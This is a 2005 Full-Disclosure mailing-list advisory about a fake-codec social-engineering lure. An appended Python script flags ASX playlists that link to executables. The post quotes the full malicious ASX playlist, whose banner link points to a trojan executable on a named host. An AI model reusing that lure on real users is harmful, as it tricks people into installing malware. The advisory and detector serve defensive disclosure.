[Full-disclosure] Social Eng. with Windows Media Player and Codec Download
- To: <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Social Eng. with Windows Media Player and Codec Download
- From: "Elia Florio" <eflorio@xxxxxxxxxxx>
- Date: Wed, 28 Dec 2005 20:00:39 +0100
Here:
hXXp://www.goodmovielaugh.com/video5.html
hXXp://www.good-movie-jokes.com/video5.html
there's some malware/adware that tries to use .ASX files as a vector
to infect Windows machines by forcing users to download and install
executables.
The trick (not an exploit!!!!) is to convince people that Windows Media
Player needs an additional codec....so that users confirm the download
of an EXE file.
In the page there's a reference to an .ASX file:
<ASX version="3.0">
<ENTRY>
<TITLE>Impossibile Trovare il Codec</TITLE>
<REF HREF="video.avi"/>
<DURATION VALUE="60:00"/>
<BANNER HREF="codec-alert.gif">
<ABSTRACT>Clicca qui per scaricare i codec aggiornati</ABSTRACT>
<MOREINFO
HREF="http://www.vcodecreceive.com/download/VideoCodec3_05b_5.exe" />
</BANNER>
</ENTRY>
</ASX>
The EXE file downloaded is probably some Download.Trojan or Trojan.Clicker
packed with Nullsoft NSIS.
EF
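
A defender-side check for the pattern described in the message, as an added example that is not part of the original post: it parses an ASX playlist and reports entries whose link elements point at an executable. The sample playlist is constructed (placeholder `.invalid` hosts), the function name and extension list are assumptions, and the input is assumed to be well-formed XML.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample modelled on the playlist quoted above; hosts are placeholders.
SAMPLE_ASX = """<ASX version="3.0">
<ENTRY>
<TITLE>Codec not found</TITLE>
<REF HREF="video.avi"/>
<BANNER HREF="codec-alert.gif">
<ABSTRACT>Click here to download updated codecs</ABSTRACT>
<MOREINFO HREF="http://downloads.example.invalid/VideoCodec.exe"/>
</BANNER>
</ENTRY>
<ENTRY>
<TITLE>Trailer</TITLE>
<Ref href="http://media.example.invalid/trailer.wmv"/>
<MoreInfo href="http://media.example.invalid/about.html"/>
</ENTRY>
</ASX>"""

# Assumed list of extensions worth flagging; extend to match local policy.
EXECUTABLE_EXTS = (".exe", ".scr", ".msi", ".bat", ".cmd", ".pif")
# Elements that carry a link the player fetches or offers to the user.
LINK_TAGS = {"MOREINFO", "BANNER", "REF", "ENTRYREF"}


def find_executable_links(asx_text):
    """Return (entry_title, tag, href) for links whose path ends in an executable extension."""
    root = ET.fromstring(asx_text)  # raises ParseError on malformed playlists
    findings = []
    for entry in root.iter():
        if entry.tag.upper() != "ENTRY":
            continue
        title = next((e.text or "" for e in entry.iter() if e.tag.upper() == "TITLE"), "")
        for elem in entry.iter():
            if elem.tag.upper() not in LINK_TAGS:
                continue
            # Compare tag and attribute names case-insensitively.
            attrs = {k.upper(): v for k, v in elem.attrib.items()}
            href = attrs.get("HREF", "")
            if urlparse(href).path.lower().endswith(EXECUTABLE_EXTS):
                findings.append((title.strip(), elem.tag.upper(), href))
    return findings


if __name__ == "__main__":
    for title, tag, href in find_executable_links(SAMPLE_ASX):
        print(f"suspicious {tag} in entry {title!r}: {href}")
```

The check only looks at the URL path, so a download served behind a redirect or a query-string parameter would need the response's content type inspected at the proxy instead.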